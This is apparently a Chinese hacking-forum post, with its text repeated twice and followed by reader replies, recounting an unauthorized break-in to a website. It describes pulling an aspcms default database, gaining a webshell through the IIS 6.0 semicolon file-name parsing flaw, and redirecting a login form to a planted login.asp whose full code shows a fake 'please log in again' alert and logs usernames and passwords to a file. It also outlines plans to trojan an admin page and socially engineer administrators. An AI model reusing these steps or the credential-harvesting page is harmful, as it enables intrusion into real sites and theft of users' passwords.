【我爱T00LS】小计一次X战过程 很菜的过程
昨天才到学校就看见又要封号了
小计一次X站过程
某人朋友发来一站点,叫上俺一起搞
在域名后面 一同乱扫, 找到后台
一看是aspcms, 试了试公开的EXP 注入无效··
果断下载源码, 分析 查看了默认数据库为data/%23data.asp
在站上测试了一下,
果断找到了 数据库, 进去之后找到密码
开始了拿SHELL之旅
然后白盒分析了一下(花了2个小时 。水平比较差,见笑)
在公司相册出发现可以自定义文件名
结合IIS6.0 解析漏洞 成功拿下SHELL
自定义文件名 生成为1.asp;
成功拿下SHELL
当时是要这个站的会员数据...
发现后台没有会员数据? 如何办?(陷入了沉思中)
当时此战 有个登陆框 登陆到数据服务器
于是在SHELL 下 改了登陆的地址
把action=xx.com 改到了A战的一个自己建了页面login.asp
此页面用来接收密码
Login.asp代码如下
<script>alert(‘由于本站点升级 请重新登陆’)</script>
<%
set fso=server.createobject("scripting.filesystemobject")
if fso.FileExists(server.mappath("log.txt"))=true then
set fin=fso.OpenTextFile(server.mappath("log.txt"))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath("log.txt"))
fout.WriteLine(temp&"user:"&username&"pwd:"&password&"礎time:"&now()&"")
fout.close
set fout=nothing
set fso=nothing
%>
<FORM id=loginForm method=post name=loginForm action="">
<TABLE class=loginT border=1 cellSpacing=0 borderColor=red cellPadding=2
width="100%">
<TBODY>
<TR>
<TD height=35>
<DIV class=font align=right>用户名:</DIV></TD>
<TD><INPUT style="FLOAT: left" id=username class="inputW font" type=text
name=username></TD></TR>
<TR>
<TD height=35>
<DIV class=font align=right>密 码:</DIV></TD>
<TD><INPUT style="FLOAT: left" id=password class="inputW font"
type=password name=password></TD></TR>
<tr>
<td height="35"><div align="right" class="font">验证码:</div></td>
<td>
<input type="text" id="validate" name="validate" class="inputW font w95" onKeyDown="if(event.keyCode==13){loginSub(1);}" style="float:left;"/>
<div id="" style="float:left;">
<img align="middle" id="validateImg" name="validateImg" src="http://111/validate.php" style="float:left;"/>
<a href="#" onClick="changeImg(1);" style="text-decoration: none;font-size:12px;float:left;"> 看不清</a>
反思: 如何渗透进B战,
1, 管理界面挂马, 搞进管理员个人电脑的机器, 然后从管理员那里拿到B战数据库权限
2. A战提权, 进A站服务器 拿到A战 管理员的相关资料 ,然后社工
3. 社工搞到A站管理员资料,搞进A站管理员个人电脑权限
网速太慢请下载附件吧.大致过程是先查到是什么cms,利用公平的漏洞无效,但数据库是默认的,然后进后台iis6拿到shell.但是后台没有想要的会员数据,于是改了登录处代码来接收密码...
附件传不上? http://pan.baidu.com/share/link?shareid=3387191152&uk=3842628911

小计一次X站过程
某人朋友发来一站点,叫上俺一起搞
在域名后面 一同乱扫, 找到后台
一看是aspcms, 试了试公开的EXP 注入无效··
果断下载源码, 分析 查看了默认数据库为data/%23data.asp
在站上测试了一下,
果断找到了 数据库, 进去之后找到密码
开始了拿SHELL之旅
然后白盒分析了一下(花了2个小时 。水平比较差,见笑)
在公司相册出发现可以自定义文件名
结合IIS6.0 解析漏洞 成功拿下SHELL
自定义文件名 生成为1.asp;
成功拿下SHELL
当时是要这个站的会员数据...
发现后台没有会员数据? 如何办?(陷入了沉思中)
当时此战 有个登陆框 登陆到数据服务器
于是在SHELL 下 改了登陆的地址
把action=xx.com 改到了A战的一个自己建了页面login.asp
此页面用来接收密码
Login.asp代码如下
<script>alert(‘由于本站点升级 请重新登陆’)</script>
<%
set fso=server.createobject("scripting.filesystemobject")
if fso.FileExists(server.mappath("log.txt"))=true then
set fin=fso.OpenTextFile(server.mappath("log.txt"))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath("log.txt"))
fout.WriteLine(temp&"user:"&username&"pwd:"&password&"礎time:"&now()&"")
fout.close
set fout=nothing
set fso=nothing
%>
<FORM id=loginForm method=post name=loginForm action="">
<TABLE class=loginT border=1 cellSpacing=0 borderColor=red cellPadding=2
width="100%">
<TBODY>
<TR>
<TD height=35>
<DIV class=font align=right>用户名:</DIV></TD>
<TD><INPUT style="FLOAT: left" id=username class="inputW font" type=text
name=username></TD></TR>
<TR>
<TD height=35>
<DIV class=font align=right>密 码:</DIV></TD>
<TD><INPUT style="FLOAT: left" id=password class="inputW font"
type=password name=password></TD></TR>
<tr>
<td height="35"><div align="right" class="font">验证码:</div></td>
<td>
<input type="text" id="validate" name="validate" class="inputW font w95" onKeyDown="if(event.keyCode==13){loginSub(1);}" style="float:left;"/>
<div id="" style="float:left;">
<img align="middle" id="validateImg" name="validateImg" src="http://111/validate.php" style="float:left;"/>
<a href="#" onClick="changeImg(1);" style="text-decoration: none;font-size:12px;float:left;"> 看不清</a>
反思: 如何渗透进B战,
1, 管理界面挂马, 搞进管理员个人电脑的机器, 然后从管理员那里拿到B战数据库权限
2. A战提权, 进A站服务器 拿到A战 管理员的相关资料 ,然后社工
3. 社工搞到A站管理员资料,搞进A站管理员个人电脑权限
网速太慢请下载附件吧.大致过程是先查到是什么cms,利用公平的漏洞无效,但数据库是默认的,然后进后台iis6拿到shell.但是后台没有想要的会员数据,于是改了登录处代码来接收密码...
附件传不上? http://pan.baidu.com/share/link?shareid=3387191152&uk=3842628911
评论30次
很古老的手法了。要与时俱进
兄弟,不看发帖时间?
很古老的手法了。要与时俱进
meao大佬求珍藏!
会编代码的都是大牛
有现成exp的X站,不算太难
多发些东西吧 呵呵
打开地址直接游览啊,百度盘支持预览的
我发到xi科了!
贴出来吧 贴出来我帮你加入活动行列
感谢LZ 分享~~
来看看啥亮点。。
楼主思路还是明了不错
上传是个亮点,不过在数据库部分也有些运气在里面
是阿 dz这套xi统略显臃肿落后阿
下附件太麻烦了,能不能直接编辑在帖子了
嗯。不错。思路还可以更好一点!~~
这个叫 点击劫持单点登录 A B站分离 登入入口是存在A站 但登录点在B站 把post的数据 通过框架转到自己的服务器 获取密码就是酱紫 同时B站还有同源 和ip限制的时候使用 高端一点的CSRF 还会带上js playload 去获取B站的页面代码 CSRF的页面也算是挂马吧 呵呵 不知道反正严格意义上来说算不上马呵呵 稍微解释的复杂了点 其实就是 登录post劫持
挂马是一门艺术~